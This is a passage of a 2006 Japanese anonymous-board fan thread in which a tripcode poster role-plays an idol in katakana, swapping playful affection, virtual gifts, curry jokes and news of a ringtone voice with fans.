(`へ′)>99
    オソイナンテアリエマセン!ボクハイツデモウェルカムデス!
    ボクモミナサンガダイスキダー!(*`▽′*)
    ヨッパラッテマス!スイマセン!


(`へ′)<100モトレタコトダシソロソロネマス!
      ボクノカワイイベイベータチオヤスミパイナポー!(`へ′)ノ

101 :ユーは名無しネ:2006/11/18(土) 01:48:44
ゑ様100ゲトおめでトン
今日はゆにらとシンメの夢が見られるといいな
もしも起きてさみしくなっちゃったらまたここに来るね
おやすみパイナップル

102 :ユーは名無しネ:2006/11/18(土) 11:01:49
Y    v(*`∀´*)vシャンメリー発見!

103 :ユーは名無しネ:2006/11/18(土) 11:03:36
ゑ様の本スレはここですか?

104 :ユーは名無しネ:2006/11/18(土) 11:25:41
>103
本スレでなくネタスレですん

ゑ様
ゆにらの誕生日祝いにきたよノシ
ケーキはゑ様が用意してるとオモーから
ゆにらの好きな焼肉でお祝いしようとお肉持ってきたよ
つ【松阪牛】】】】】】】】

105 :ユーは名無しネ:2006/11/18(土) 16:37:10
ゑ様ゑ様
自分も遅ればせながらゆにらのお誕生日を
ここの姐さんとゑ様とお祝いしに来たよ
何を用意しようか迷ったけど盛り上げ用にクラッカー買ってきた
良かったら使ってね
つ△▲△▲△▲△▲


106 :ユーは名無しネ:2006/11/18(土) 23:01:10
ゑ様ゑ様
この前友にカラオケで指摘されて気付いたんだけど自分ナツラルにゑ様のマイクの持ち方と同じマイクの持ち方してたよ(*´∀`)
友もカクイイ持ち方だって言ってたのでこのまま使いつづけますねノシ

107 :ユーは名無しネ:2006/11/19(日) 13:30:03


108 :ユーは名無しネ:2006/11/19(日) 13:52:31
|⊇゚)コソ

109 :ユーは名無しネ:2006/11/19(日) 15:36:55
|∀´⊃コソ

110 :ユーは名無しネ:2006/11/19(日) 17:01:05
ゆにらにミヒィいらっしゃい(*´∀`)つ旦~旦~

ゑ様最近寒くなったけど風邪引いてないかな?
細いから人一倍寒いと思うけどしっかり防寒してね(`・ω・´)b

111 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 22:18:57
(`へ′)>101
    イイユメミレマシタカ?サミシクナクテモキテクダサイ!ボクマッテマス!


(`へ′)>102
    ニカチャ!オサケハダメデス!ソンナヒマガアッタラウタノレンシュウデモシテクダサイ!


(`へ′)>103
    ホンスレハベツニアルノデサガシテミテクダサイ!
    サイキンソノシツモンオオイケドボクノジダイガキテイルンデショウカ!!


(`へ′)>104
    つ【松阪牛】】】】】】】】アリガゑゑ!
    オニクデス!ミヒィクンモヨッテキソウナキガシマス!


(`へ′)>105
    つ△▲△▲△▲△▲アリガゑゑ!
    ユニラクンオモイノオネイサンガタクサンイテボクウレシイデス!


(`へ′)>106
    オネイサンソノチョウシデス!ソノママトモダチニヒロメチャッテクダサイ!(*`▽′*)


(`へ′)>107
    アッユニラクン19サイオメーデス!ヒマナトキニマタキテクダサイ!ベンキョウガンバッテ!
    つ【松阪牛】コレドウゾ!


(`へ′)>109
    ミヒィクンコソコソシナイデクダサイ!
    つ【松坂牛】オニクイッショニタベマスカ!!


(`へ′)>110
    ホソイデスガカラダダケハジョウブナノデイマノトコロダイジョウブデス!アリガゑゑ!

112 :ユーは名無しネ:2006/11/19(日) 22:21:44
ゑ様こんばんはノシ
ゑ様に遭遇できて嬉しいよ
でも明日はテストなので今日は帰りますね(´・ω・`)
また会いましょうゑ様ノシ

113 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 22:26:07
(`へ′)>112
    コンバンハ!ソンナカナシイカオシナイデクダサイ!
    ボクガゲットシタ111ヲオネイサンニササゲルノデテストガンガッテクダサイ!
    ファイトー!ヽ(*`▽′*)ゞ

114 :ユーは名無しネ:2006/11/19(日) 22:31:14
ゑ様ゑ様こんばんはノシ
あのねゑ様
ニカチャがシャンメリー飲もうとしてるのゑ様止めてるけどシャンメリーってお酒じゃないんだよ
シャンパンを安価で飲みやすいようにノンアルコールにしたのがシャンメリーなんだって

115 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 22:34:55
(`へ′)>114
    ソウダッタンデスカ!ナニモシラズニスイマセン!ボクノバカバカ!

116 :ユーは名無しネ:2006/11/19(日) 22:39:21
ゑ様ゑ様初遭遇だよ
せっかくの日曜日だったのにお天気が悪くてがっかりだったよ
ゑ様は今日は何をして過ごしたのかな?
明日からまた一週間頑張るからゑ様も頑張ってねノシ

117 :ユーは名無しネ:2006/11/19(日) 22:41:23
自分もよく知らなかったからナカーマだよ(*´∀`)人(`へ′)
ゑ様のためにググっちゃいました
だからゑ様の反省を無駄にしてゑ様が手をグーにして
頭をポカポカ殴ってる姿を想像してモヘちゃった自分を許してねorz

118 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 22:47:33
(`へ′)>116
    ハジメマシテ!ゑサマー∠(*`▽′*)ゝデス!
    キョウハイマカラダンスノレンシュウヲシマス!アシタショウクラナノデ!OAタノシミニシテイテクダサイ!


(`へ′)>117
    ボクノタメニググッテクレルナンテ!ヨノナカニハナンテシンセツナヒトガイルンダロウ!
    モウドンナソウゾウデモユルシチャイマス!カンシャカンゲキアメアラレデス!!

119 :ユーは名無しネ:2006/11/19(日) 23:04:55
ゑ様に親切だなんて言ってもらえてテラウレシス(*´∀`)
想像する許可も貰ったのでこれからイパーイ想像するねノシ
ゑ様はウルウルとかプンプンはする予定はないの?

120 :ユーは名無しネ:2006/11/19(日) 23:06:48
ゑ様こんばんはノシ
今日は雨降ってたから引きこもっちゃったよ
今度雨の日はゑ様と相合傘で出かけたいな(*´∀`)

121 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 23:12:05
(`へ′)>119
    アーデモイクナイソウゾウハヤメテクダサイ!ハズカシイノデ!(⊃へ⊂)
    ウルウル!プンプン!ッテナンデスカソレ!ムチデスイマセン!


(`へ′)>120
    コンバンハ!ナラボクガカサヲサシマス!ヌレチャウノデボクニクッツイテクダサイ!
    デモマタフライデーサレソウデス!ドウシヨウ!

122 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 23:24:24
.。・゚(゚`へ′゚)゚・。. ウルウル


(`ε′#)プンプン!


(`へ′)<コンナカンジデショウカ!ナンダカスッゴクビミョーデス!

123 :ユーは名無しネ:2006/11/19(日) 23:24:27
いくない想像が具体的にどんなのかゑ様教えてください(w
説明不足だたけどウルウルとプンプンは玉緒の得意技のヤシだよ
是非ゑ様にもやってもらいたいな(*´∀`)

124 :123:2006/11/19(日) 23:25:34
ゑ様ニアミススマソorz
それでおkだよ(*´∀`)ノシ
ゑ様キャワキャワでモヘ

125 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 23:31:19
(`へ′)>123
    イクナイソウゾウッテイッタライクナイソウゾウデス!ナニヲイワセヨウトシテルンデスカ!
    ムダデス!モウボクハオネイサンタチノユウワクニマケマセン!!!


(`へ′)>124
    ボクコソスイマセン!
    オナジジカンニオナジコトヲカンガエテイタミタイナノデボクハウレシイデス!(*`▽′*)ニッ!

126 :ユーは名無しネ:2006/11/19(日) 23:39:30
ゑ様が誘惑から強くなっててビクーリしたけどちとウレシス(*´∀`)
前スレではゑ様がよくツンデレ姐さんの愛に泣かされちゃったりしてたよね

ゑ様と同じ時間に同じこと考えてるなんて運命だとオモていいですか?

127 :(*`へ′) ◆JUowmt7f2Y :2006/11/19(日) 23:49:47
(`へ′)>126
    ハイ!モウボクナキマセン!ウタレヅヨクナッタンデス!キブンハドンットコイ!デス!
    ウンメイナンテイワレタラオネイサンヲイシキシチャイマス!ヤメテクダサイ!(⊃へ⊂)

128 :ユーは名無しネ:2006/11/19(日) 23:59:28
ゑ様テラカッコヨス(*´∀`)
じゃあどんなにイジられても大丈夫なんだね
ゑ様どんどん自分を意識してください!ゑ様に意識されるなんて嬉しすぎて目汁ものです

明日も早いので先にうにしますねノシ
ゑ様オヤスミパイナップル!

129 :(*`へ′) ◆JUowmt7f2Y :2006/11/20(月) 00:13:03
(`へ′)>128
    ヨケイオネイサンヲアオッテシマッタキガシマス!キケンデス!
    デモボクモマケマセン!エッヘン!オヤスミパイナップル!


(`へ′)<ミナサンモウネルンデスカ?イタダイタクラッカーイッショニヤリマセンカ!


(`へ′)つ△.*・゜゚☆ パーン!

130 :ユーは名無しネ:2006/11/20(月) 01:06:32
ゑ様遅くなっちゃってゴメンネ
せっかくだから自分もらっとくよ(*´∀`)つ【クラッカー】
起こさないようにヒソーリやらせてね
つ△.*・゜゚☆ 
ゑ様とゑ様スレの皆様オヤスミパイナップル!

131 :ユーは名無しネ:2006/11/20(月) 08:05:51
ゑ様ゑ様
もしかしたら以前に既出かもしれないんだけど
昨日ジャ○クスポーツで笑った目元がゑ様とソクーリな競輪選手が出ていたよ(*´∀`)
思わずドチドチした自分を許してorz

132 :ユーは名無しネ:2006/11/20(月) 18:49:51
ゑ様の着ボイスキタワァ*・゚゚・*:.。..。.:*・゚(n‘∀‘)η゚・*:.。. .。.:*・゚゚・* !!!!!

133 :ユーは名無しネ:2006/11/20(月) 19:07:34
ゑ様
着ボイス
キャワ

134 :ユーは名無しネ:2006/11/20(月) 19:11:32
ゑさまゑさま
着ボDLしたよ
明日からゑ様の声で朝起きるね

135 :ユーは名無しネ:2006/11/20(月) 19:22:39
ゑ様
着ボゲトしたよ
着信音にしたから電話待ってるねノシ

136 :ユーは名無しネ:2006/11/20(月) 19:44:04
ゑ様ゑ様
着ボをどこに使ったらよいのか分からないよ(´・ω・`)
ゑ様専用の着信音にしても良いかな?
記念すべきゑ様の初着ボに(*´∀`)つ△.*・゜゚☆パーン!

137 :ユーは名無しネ:2006/11/20(月) 22:35:08
ゑ様ゑ様
公録行ってきました
いつも着てる黒スーツ凄い方のおさがりだったんですね
爺様に首ねっこ掴まれるゑ様キャワ

138 :ユーは名無しネ:2006/11/20(月) 23:00:21
ゑ様ゑ様
髪色変えたってほんとですか!?
黒髪ゑ様ってほんとですか!?(*´д`)

139 :ユーは名無しネ:2006/11/21(火) 15:21:43
ゑ様ゑ様
黒髪ですよって>138姐さんに囁いてもいいですか?
新曲にあわせて投げキスするゑ様がキャワで卒倒寸前でした

140 :ユーは名無しネ:2006/11/21(火) 18:42:45
ゑ様ゑ様
明るい☆見たよ
ゑ様の愛のこもったカレーのおすそわけまだかなぁ
wktkwktk(*´∀`)

141 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 21:31:24
(`へ′)>130
    オネイサンニオコサレルナラウレシイクライデス!マタイッショニヤリマショウ!


(`へ′)>131
    ソレクライナラユルシマス!ボクハココロノヒロイオトコナノデ!ウワキハユルシマセンガ!


(`へ′)>132
    ハイ!キマシタ!オネイサンキラビヤカデスネ!


(`へ′)>133
    アリガゑゑ!ボクノコエドウデシタカ?


(`へ′)>134
    アリガゑゑ!アサ1バンニボクノコエヲキイテモラエルナンテ!ウレシイデス!


(`へ′)>135
    ハイ!デモオネイサンノバンゴウシラナイノデヨカッタラサラシテクダサイ!マッテマス!


(`へ′)>136
    ドウゾドウゾ!デハオネイサンモバンゴウヲサラシ(ry
    ウソデス!ソンナコトシタラアクヨウサレテシマウノデサラサナイデクダサイ!>135ノオネイサンモオネガイシマス!


(`へ′)>137
    デモボクノホウガシンチョウタカイノデツンツルテンジャナイデスカ?ダイジョウブデスカ!


(`へ′)>138
    ホントウデス!クロカミノボクモカッコイイノデヨロシクオネガイシマス!


(`へ′)>139
    ナゲチューミナサンニヨロコンデモラエテヨカッタデス!
    ササヤクッテナンカアヤシイデス!ズルイ!ボクニモササヤイテクダサイ!!(*`へ′*)


(`へ′)>140
    ボクノアイノコモッタカレーハモチロンカラクチデスガ!ソレデモタベテクレマスカ!

142 :ユーは名無しネ:2006/11/21(火) 21:43:20
ゑ様こんばんゑゑ!
>140だけど自分も辛口派なのでおkですん
うーんと辛くて愛情たっぷりなのお願いしますね

143 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 21:50:47
(`へ′)>142
    コンバンハ!デモボクハツクルヨリタベルホウガスキナノデオネイサンガツクッテクダサイ!
    ドンドンタベテモットオオキクナリマス!\(`へ′)/

144 :ユーは名無しネ:2006/11/21(火) 21:56:28
ゑ様こんばんゑ!
黒髪ゑ様想像しただけで氏にそうだよ(*´Д`)

145 :ユーは名無しネ:2006/11/21(火) 22:00:31
ゑ様ゑ様こんばんはノシ
最近ゑ様担の姐さんを見るのが辛いよorz
ここの姐さん達は大丈夫なんだけど自分よりゑ様のことを知ってるゑ様担姐さんに
少し嫉妬しちゃったりするんだ
重い愛でごめんね(´・ω・`)

146 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 22:07:50
(`へ′)>144
    コンバンハ!ソウゾウシテモイイデスガシナナイデクダサイ!
    ジブンデモケッコウキニイッテマス!


(`へ′)>145
    コンバンハ!シットデスカ!タショウノシットハカワイイトオモイマス!
    ボクハコウミエテミエナイトコロニキンニクガツイテイルノデ!オモクテモゼンゼンヘイキデス!(*`▽′*)ニコ!

147 :ユーは名無しネ:2006/11/21(火) 22:08:57
ゑ様が食べたいって言うなら作ってあげてもいいよ
激辛だけどゑ様への愛をイパーイ詰込んでおくので残さず食べてね

>145ドンマイ
昔のゑ様もいいけどこれからのゑ様を一緒に愛でていこうよ(*´∀`)

148 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 22:16:43
(`へ′)>147
    カンガエタダケデアセガデテキソウデスガ!ガンガリマス!(;`へ′)ヒー!
    オネイサンヤサシイデスネ!ソノチョウシデボクニモヤサシクシテクダサイ!


(`へ′)<イイオネイサンバッカリデウレシクナッタノデオチャイレマシタ!ドウゾ!
つ旦旦旦旦~~~

149 :ユーは名無しネ:2006/11/21(火) 22:27:44
ゑ様いただきますね(*´∀`)つ旦~
自分の嫉妬さえもゑ様可愛いって言ってくれてd!
自分がゑ様への愛で倒れそうになったときは細い身体でしっかり支えてくださいねノシ

150 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 22:47:34
(`へ′)>149
    リョウカイデス!デモボクモウスコシキンニクガホシイトコロデス!マッチョナボクハキライデスカ?
    アツイノデキヲツケテノンデクダサイ!

151 :ユーは名無しネ:2006/11/21(火) 22:53:33
ゑさまこんばんはノシ
マッチョなゑ様想像したらテラモエス
ゑ様ならどんなになっても好きです

152 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 22:57:50
(`へ′)>151
    コンバンハ!ムキムキナボクハチョットコワイキモシマスガ!
    オトコナライチドハナッテミタイモノデス!オネイサンモヨカッタラオチャドウゾ!

153 :ユーは名無しネ:2006/11/21(火) 23:02:12
ゑ様に入れていただいたお茶を飲んだら熱くて
唇がヒリヒリするのでチューして治してくださいって言ったらチューしてくれますか?
自分はマッチョすぎるゑ様が想像出来ないよorz
でもゑ様はきっと脱いだらすごいんですキャラだとさっき友と話してたところだよ(*´∀`)

154 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 23:11:17
(`へ′)>153
    マァヌイダラソレナリニスゴイガ…!ミセマショウカ?
    チチチュートカホントウカンベンシテクダサイ!ソウヤッテボクノリアクションヲタノシマナイデクダサイ!!(`へ′)

155 :ユーは名無しネ:2006/11/21(火) 23:17:40
相変わらずゑ様純粋で反応がキャワだね(*´∀`)
またツンデレの血が騒いじゃったよゑ様スマソorz
是非素晴らしいゑ様のお身体を自分の前で脱いで魅せて見せてください!

ではゑ様と姐さん方オヤスミパイナップル!

156 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 23:23:41
(`へ′)>155
    ゼンゼンダイジョウブデス!コレクライデハヘコタレマセン!
    ミセヨウトシタケドオネイサンネルナラヤメテオキマス!ザンネンデス!オヤスミパイナップル!(*`▽′*)

157 :ユーは名無しネ:2006/11/21(火) 23:26:53
>155がいなくなった今がチャーンス(notダギャ
自分だけのゑ様
ゑ様をひとりじめ(*´∀`)

158 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 23:31:09
(`へ′)>157
    コ、コンバンハ!
    ボクオンナノヒトト2リキリトカキンチョウシマス…!ドウシヨウ!

159 :ユーは名無しネ:2006/11/21(火) 23:48:12
ゑ様
自分もいるよ
邪魔してスマソ
でも実はわざとだよ
お茶いただきますねつ旦

160 :ユーは名無しネ:2006/11/21(火) 23:53:05
ゑ様ゑ様
こんばんは
自分はゑ様の視線が欲しくてわざとふざけてたよ

161 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 23:53:14
(`へ′)>159
    オネイサンコンバンハ!サメテルノデチンシテカラノンデクダサイ!
    ジャマナンテアリエマセン!ボクノチャクボキイテクレマシタカ?

162 :(*`へ′) ◆JUowmt7f2Y :2006/11/21(火) 23:59:07
(`へ′)>160
    オネイサンモコンバンハ!!ソレハコンサートノハナシデスカ?

163 :ユーは名無しネ:2006/11/22(水) 00:02:01
ゑさま
159だけどお気遣いマリガトン
でも自分猫舌だからちょうどいいよ
着ボイスは目覚ましにしたよ
今日はゑ様の声で起きられて幸せでした

164 :ユーは名無しネ:2006/11/22(水) 00:05:35
ゑ様ゑ様
160ですけどプラハの歌詞を絡めてみました
紺では恥ずかしくて大人しくしてますが気付いたらお手振りしてくださいね(*´∀`)ノシ

165 :(*`へ′) ◆JUowmt7f2Y :2006/11/22(水) 00:11:50
(`へ′)>163
    ボクノコエヲメザマシニ…ベツニテレテナイデス!(n`へ′*)n


(`へ′)>164
    カシダッタンデスカ!キヅカズニスイマセン!
    オネイサンボクガキタトキクライハサワイジャッテクダサイ!(`へ′)ノシ

166 :ユーは名無しネ:2006/11/22(水) 00:35:02
ゑさま
ゑ様をもっと照れさせたいな
どうしたらいい?

167 :(*`へ′) ◆JUowmt7f2Y :2006/11/22(水) 00:44:07
(`へ′)>166
    ベタボメサレルトテレマス!デモアイノアルダメダシモタマニハシテクダサイ!

168 :ユーは名無しネ:2006/11/22(水) 00:45:56
ゑさまゑさま
ゑ様がカワユスすぎて
自分にはダメ出しなんてできないよ
自分はダメだねゑさま

169 :(*`へ′) ◆JUowmt7f2Y :2006/11/22(水) 00:51:35
(`へ′)>168
    ボクニワルイトコロガアッタラスグイッテクダサイネ!オネイサンハダメナンカジャナイデスヨ!
    ボクガイウノダカラマチガイアリマセン!(*`▽′*)ニッ!


(`へ′)<ボクハアシタノジュンビヲシテネマス!オヤスミパイナップゑゑット!

170 :ユーは名無しネ:2006/11/22(水) 19:48:12
ゑ様ゑ様
自分ズニア紺申し込みしてないんだけど某紺であんまり良いことがなかったんだorz
でもこれはゑ様に逢うときまでに運を取っておけってことだと思うことにしたよ
ゑ様に逢えたときには良席が来るようにこれから良いこと貯金するようにするね(*´∀`)ノシ

171 :ユーは名無しネ:2006/11/22(水) 23:14:41
ツマンネ

172 :ユーは名無しネ:2006/11/22(水) 23:56:09
ゑ様ゑ様
ゑ様のエプロン姿
ドキッとしちゃっいました(*´Д`)

173 :ユーは名無しネ:2006/11/23(木) 10:24:57
ageage〜♪

174 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 22:08:57
(`へ′)>170
    ヨイコトヲシテレバキットウンモミカタシテクレソウデスネ!ボクモチョキンシヨウカナ!


(`へ′)>172
    アリガゑゑ!ボクモアシ2ノナカデイチバンニアッテイタヨウナキガシマス!


(`へ′)<ウタイマス!

     アヒゑゑアヒゑゑボクタ〜チハ!
     イッショ〜イッショサアヒゑゑゑゑ〜!

175 :ユーは名無しネ:2006/11/23(木) 22:17:54
ゑ様ゑ様こんばんはノシ
一瞬何のお歌か分からなかった自分を許してね
アヒゑゑキャワだよねゑ様(*´∀`)

176 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 22:21:45
(`へ′)>175
    オヒサシブリデス!ウタッテコトガワカッテモラエタダケデウレシデス!
    ウレシイノデツヅキモウタイマス!!アヒルノモノマネツキデス!


(`◇′)グェグェグェ!クワクワクワ!アヒゑノワルツ〜!

177 :ユーは名無しネ:2006/11/23(木) 22:30:10
ゑ様のアヒルゑゑの物真似がキャワすぎます(*´Д`*)
今誰も居ないみたいなのでこのアヒゑゑ自分だけのものにしてイイですか?
是非家で飼わせてください

178 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 22:35:08
(`へ′)>177
    エ…!(;`へ′)
    ボクズットアヒゑノモノマネシテルナンテムリデス!カウノハアキラメテクダサイ!!

179 :ユーは名無しネ:2006/11/23(木) 22:43:33
冗談ですよゑ様
飼うのは諦める代わりにアヒゑゑだけは自分のものにさせてください(*´∀`)
またアヒゑゑの物真似もしてくださいねノシ

180 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 22:53:01
(`へ′)>179
    ジョーダンデスカ!チョットキタイシテタノニ!(*`へ′*)
    コンナアヒゑデヨケレバドーゾ!グェグェグェナキマスガタイセツニシテクダサイ!

181 :ユーは名無しネ:2006/11/23(木) 23:03:00
期待してただなんてゑ様も大胆ですね(*´∀`)オホホ
アヒゑゑいただきますねノシ

いつもは雑誌買わないことにしてるのにあまりにもゑ様のビジュにモヘたので思わず買ってしまったよorz
ゑ様のカレーにだけ具が入ってないように見えるのは気のせいですか?

182 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 23:08:54
(`へ′)>181
    ブキミナワライヤ、ヤメテクダサイ!
    オカイアゲアリガゑゑ!アレハモウタベテシマッタンデス!ダッテジャガイモオイシソウダッタンデス!!

183 :ユーは名無しネ:2006/11/23(木) 23:21:43
そんなジャガイモ好きなゑ様につ【フライドポテト】
ゑ様のスプーンが自分にアーンしてくれてるようだたよorz
手も爪も綺麗で細くいゑ様モエス(*´Д`*)

184 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 23:29:45
(`へ′)>183
    つ【フライドポテト】イタダキマス!
    ボクノタベカケノスプーンデスガイイデスカ?ソシタラカンセスキッスデスネ!(*`Д′*)ポッ!

185 :ユーは名無しネ:2006/11/23(木) 23:40:41
ゑさまこんばんはノシ
ゑ様の愛情たっぷりカレー自分も食べたいな
お片づけは手伝うのでおながいします

186 :ユーは名無しネ:2006/11/23(木) 23:43:15
自分は間接チッスでも全然おkだよノシ
むしろゑ様と間接チッスしたいな(*´∀`*)
いっそここの姐さん方みんなでカレーパーティーしましょう
ゑ様の作った激辛カレーwktk

187 :(*`へ′) ◆JUowmt7f2Y :2006/11/23(木) 23:57:46
(`へ′)>185
    オヒサシブリデス!ワカリマシタ!
    ボクノアイジョウタップリイレタカレーパーチーシマショウ!


(`へ′)>186
    オネイサンジョーダンデスヨ!サッキノオカエシデス!(*`▽′*)ニヤ
    キョウハミナサンイソガシイヨウナノデ…ヒトガタクサンイルトキニ!ヤリマショウ!

188 :ユーは名無しネ:2006/11/24(金) 00:07:30
ゑ様にしてやられちゃいました(ノ∀`)
そうだね人がたくさん居るときにカレーパーチーしましょうノシ
だけど実は自分激辛は苦手なのでゑ様の愛で自分の分だけあまーくしてくださいね

189 :(*`へ′) ◆JUowmt7f2Y :2006/11/24(金) 00:21:30
(`へ′)>188
    チョットコマッタカオノオネイサンモミテミタイデス!
    コレヲキカイニゲキカラヲコクフクシマショウ!ウーントカライカレーツクッテマッテマス!(*`▽′*)ウヒョヒョ!


(`へ′)<デハボクハアシタアサハヤイノデサキニネマス!
      オヤスミパイナップゑゑ!グェグェ!

190 :ユーは名無しネ:2006/11/24(金) 00:29:23
じゃあ子悪魔ゑ様になっちゃったゑ様対策にお水もたくさん用意しておきますねノシ

ゑ様も自分のアヒゑゑもオヤスミパイナップル!

191 :ユーは名無しネ:2006/11/24(金) 05:57:13
ゑ様ゑ様もはよう
>190姐さん阻止アヒゑゑもゑ様も皆で仲良く分けましょう
独り占めは許しません(*´∀`)
☆誌のゑ様は口イパーイ頬張ってキャワだったよ
お腹空いてたのかな?

192 :ユーは名無しネ:2006/11/26(日) 23:13:17
ゑ様ゑ様
笛夢みに行ったの?

193 :(*`へ′) ◆JUowmt7f2Y :2006/11/27(月) 21:16:41
(`へ′)>190
    オモワズSコゴロヲクスグラレマシタ!コンドコアクマニナッタラ「デビゑ」トデモヨンデクダサイ!


(`へ′)>191
    ジツハツクッテルトキカラオナカスイテマシタ!グーグーナッテタナンテナイショデス!


(`へ′)>192
    ミニイ(ry…!ソンナキワドイコトキカナイデクダサイ!


(`へ′)<ミナサンオナカスイテマスカ?
      ヤクソクノカレーツクッテキタノデタベテクダサイ!
      つ【ゑカレーカラクチ】】】】】キョウハエプロンスガタノボクデス!o(`へ′)o

194 :ユーは名無しネ:2006/11/27(月) 21:33:39
ゑ様こんばんは!
エプロン姿ゑ様キャー∩(´∀`∩)(∩´∀`)∩キャー
ありがたくいただいちゃいますね(*´∀`)つ【ゑカレーカラクチ】

195 :ユーは名無しネ:2006/11/27(月) 21:35:51
ゑ様ゑ様こんばんはノシ
アヒゑに引き続きデビゑもキャワそうだね
(*´∀`)つゑ様の愛情タプーリの【ゑカレーカラクチ】d!早速いただきますね
エプロン姿のゑ様を愛でつつ激辛カレー挑戦するよ

196 :(*`へ′) ◆JUowmt7f2Y :2006/11/27(月) 21:42:58
(`へ′)>194
    コンバンハ!ボクノカテイノアジハドウデスカ?
    ボ○カレーヨリオイシクツクレタトオモイマス!エッヘン!


(`へ′)>195
    コンバンハ!オネイサンクチニカレーツイテマス!ボクガトリマス!カワイイナーモウ(*`▽′*)づ

197 :ユーは名無しネ:2006/11/27(月) 21:53:08
ゑ様可愛いだなんて(*´∀`*)ポッ
ゑ様の方が自分の何倍も何万倍もキャワだよ
口に付いてたカレー拭ってくれるなんてテラウレシス(*´∀`)
激辛カレーでヒリヒリしてたお口も何だかおさまった気がするよ

198 :(*`へ′) ◆JUowmt7f2Y :2006/11/27(月) 22:07:23
(`へ′)>197
    ソンナニキャワトイワレルトテレテウマクハナセマセン!
    デモウレシイデス!アリガゑゑ!
    

(`へ′)<トイウカボクノホンスレハドウナッテルンデショウカ!
      ナンダカジブンノスレヲジブンデシンパイスルノハチョットカナシイデス!
      …ボクニンキナイノカナ!.。・゚(゚`へ′゚)゚・。.

199 :ユーは名無しネ:2006/11/27(月) 22:17:21
泣かないでゑ様!
自分はゑ様が大スチです!!!

200 :ユーは名無しネ:2006/11/27(月) 22:25:03
上手く話せないなんてゑ様更にキャワ(*´∀`)
もっと褒めちゃっても良いですか?
ゑ様ゑ様泣かないでつ゛
自分は本スレ見失っちゃってそっちでは話出来ないけど自分もゑ様だいしてるよ

201 :ユーは名無しネ:2006/11/27(月) 22:30:35
ゑ様こんばんはノシ
自分もカレーいただきますね
(*´∀`)つ【ゑカレーカラクチ】

ゑ様自分もゑ様大スチだよ!
姐さん達向こうに沢山いれば移動したいね
スレストの意味がよく分からずごめんなさいorz

202 :ユーは名無しネ:2006/11/27(月) 22:38:16
ゑ様ゑ様の本スレって多分あそこで合ってますよね?
確かにかなり人稲で過疎ってますねorz
ミヒィ本スレも新スレ立てて移動したみたいだしこのままだとマズイのかな

>201
スレストってのは簡単に言うとスレが停止しちゃうってことかな

203 :(*`へ′) ◆JUowmt7f2Y :2006/11/27(月) 23:12:32
(`へ′)<カレーノアトカタヅケシテタラトウジョウスルノガオソクナリマシタ!


(`へ′)>199
    ドウモドウモ!キライニナッタラショウチシマセン!(`へ′)σ)∀`)ツンツン!


(`へ′)>200
    ホメテモラウマエニコレヲヤラセテクダサイ!200ゲトオメー∠(*`▽′*)ゝデス!
    サァオモウゾンブンホメテクダサイ!ドウゾ!イドウシタラゼヒミツケテクダサイ!


(`へ′)>201
    オネイサンタクサンイマスネ!ヨカッタラハナシアイシテクダサイ!
    ボクモヨクワカッテイナイノデナントモイエマセンガ!


(`へ′)>202
    アソコデス!キットソウデス!カソッテマスガリッパナボクノホンスレデス!!
    コノママダト マ ズ イ デス!(;`へ′)ヒー!

204 :ユーは名無しネ:2006/11/27(月) 23:23:34
ゑ様後片付け手伝えなくてスマソ
これでも飲んでユクーリしてねつ旦~
ゑ様はキャワでカッコヨスでスラリと細くてやんちゃだけど優しいとこが大スチです(*´∀`)
他にもイパーイあるけど多すぎて言えないのでこの辺にしておくねノシ

そういえばゑ様
ゑ様パワー注入してもらった検定合格したよノシ
さすがゑ様のお力ですね(*´∀`)

205 :ユーは名無しネ:2006/11/27(月) 23:30:04
ゑ様&姐さん方
本スレのことだけど今たててもミヒィの本スレみたいになる可能性大だし
ここで話し合ってスレ消費するのもなんなので
本スレのことは本スレで話し合うのがいいとオモーのだがそのへんどうですか?

206 :(*`へ′) ◆JUowmt7f2Y :2006/11/27(月) 23:37:08
(`へ′)>204
    アイサレスギテマス!シ ン ジ ラ レ ナ イ !(つへ′)
    ソノヘンニシテオイテクダサイ!カナリテレマス!ケンテイオメデトウゴザイマス!!



(`へ′)>205
    モチノロンロンデス!IDナンテキニセズハナシアイシチャッテクダサイ!
    ボクハココカラミマモッテマス!ボクノスレワスレラレテナクテヨカッタ!キョウハグッスリネムレソウデス!!
    マダネマセンガ!!

207 :(*`へ′) ◆JUowmt7f2Y :2006/11/27(月) 23:42:40
(`へ′)<オチャモライワスレテマシタ!アリガゑゑ!つ旦~
      アッタマリマス!

208 :ユーは名無しネ:2006/11/27(月) 23:57:23
>205オゲです
ちょっと放置し杉たねゑ様ごめんねゑ様
忘れてたわけじゃないよちゃんとゑ様の本スレも考えてるからね
向こうで徐々に決めていけたらいいな

ゑ様後片付け乙(*´∀`)
もうエプロンは脱いじゃったのかな?

209 :(*`へ′) ◆JUowmt7f2Y :2006/11/28(火) 00:07:55
(`へ′)>208
    エプロンハヌギマシタ!アシタセンタクシテモライマス!
    オネイサンモ1ニチオツカレーデス!

210 :ユーは名無しネ:2006/11/28(火) 01:02:30
ゑさま
ゑさまのエプロン姿みたかったよ
せめて洗濯は自分にさせてくださいね

211 :ユーは名無しネ:2006/11/28(火) 02:17:03
ゑ様ゑ様
早く少蔵が見たくて仕方ないよ
ローラーで華麗に滑るゑ様wktk!
ゑ様と姐さん達のやりとり見てたらカレー食べたくなったから
